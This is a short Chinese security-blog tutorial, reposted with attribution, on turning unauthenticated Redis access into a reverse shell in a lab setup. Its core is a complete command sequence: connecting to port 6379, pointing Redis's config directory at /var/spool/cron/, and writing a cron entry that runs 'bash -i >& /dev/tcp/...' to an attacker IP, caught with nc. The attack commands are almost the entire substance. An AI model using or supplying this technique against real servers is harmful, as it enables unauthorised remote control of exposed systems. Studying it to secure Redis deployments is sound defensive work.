Redis未授权访问之反弹shell

华盟原创文章投稿奖励计划

靶机:centos6.5

公鸡:Kali

一、crontab基础姿势

Crontab定时任务配置 - 潇湘隐者 - 博客园

二、redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

Redis未授权访问之反弹shell

telnet 192.168.236.130 6379 //未授权登录

config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面

set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell,换行是必不可少的。

三、nc反弹

Redis未授权访问之反弹shell

四、Centos里面查看crontab任务。

Redis未授权访问之反弹shell

华盟知识星球入口

作者:呵呵呵呵呵呵
链接:https://zhuanlan.zhihu.com/p/25015624
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/31658.html

发表评论